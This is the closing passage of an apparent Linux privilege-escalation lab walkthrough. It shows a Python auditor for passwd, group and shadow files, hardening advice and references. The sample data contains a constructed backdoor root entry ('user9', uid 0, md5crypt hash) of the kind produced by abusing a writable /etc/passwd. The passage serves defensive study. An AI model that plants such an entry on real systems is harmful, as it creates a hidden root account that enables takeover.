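        if len(g) != 4:
            continue
        gname, _, ggid, members = g
        member_list = [m for m in members.split(",") if m]
        if ggid == "0" and gname != "root":
            findings.append(f"group: {gname} is a second gid-0 group")
        if ggid == "0" and member_list:
            findings.append(f"group: root group has members {', '.join(member_list)}")
    for s in parse_colon_file(shadow_text):
        if len(s) < 2:
            continue
        name, h = s[0], s[1]
        if h == "":
            findings.append(f"shadow: {name} has an empty password (no password required)")
        elif h.startswith(("!", "*")):
            continue                                  # locked, or password login disabled
        elif h.startswith("$1$"):
            findings.append(f"shadow: {name} uses md5crypt (weak, brute-forces quickly)")
        elif not h.startswith(STRONG_HASH_PREFIXES):
            findings.append(f"shadow: {name} uses an unrecognised or legacy hash format")
    return findings


# Constructed samples; the user9 line is the one produced in this section.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
mysql:x:111:115:MySQL Server,,,:/nonexistent:/bin/bash
user1:x:1001:1001:,,,:/home/user1:/bin/bash
user7:x:1007:0:,,,:/home/user7:/bin/bash
user9:$1$xyz$t03y2O3ybmP8UNUoFQEQl/:0:0:root:/root:/bin/bash
"""
SAMPLE_GROUP = """root:x:0:user4,user7
user4:x:1004:
"""
# Shadow hashes are placeholders (not real credentials); only the prefix matters to the check.
SAMPLE_SHADOW = """root:$1$abcd$PLACEHOLDERHASHxxxxxxxxxx:20000:0:99999:7:::
daemon:*:20000:0:99999:7:::
user1:$6$abcd$PLACEHOLDERHASHxxxxxxxxxx:20000:0:99999:7:::
"""

if __name__ == "__main__":
    # Live use: audit_passwd(open("/etc/passwd").read(), open("/etc/group").read(), open("/etc/shadow").read())
    for finding in audit_passwd(SAMPLE_PASSWD, SAMPLE_GROUP, SAMPLE_SHADOW):
        print(finding)
```

Seven findings come out of the constructed files, each mapping to one of the escalation steps above. Beyond fixing the entries, /etc/passwd should be root:root 0644 (the root-group write that this VM grants is the real enabler), and file-integrity monitoring on /etc/passwd, /etc/shadow and /etc/group catches the replacement the moment it happens.
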
Thank you for reading. I hope you found this write-up helpful. If you notice any mistakes or have suggestions, feel free to leave a comment below.

References

[1] - https://www.vulnhub.com/entry/escalate_linux-1,323/

[2] - https://tryhackme.com/room/linprivesc

[3] - https://gtfobins.github.io/gtfobins/


Source: https://infosecwriteups.com/escalate-linux-1-walkthrough-f3e9894d87f2?source=rss----7b722bfd1b8d---4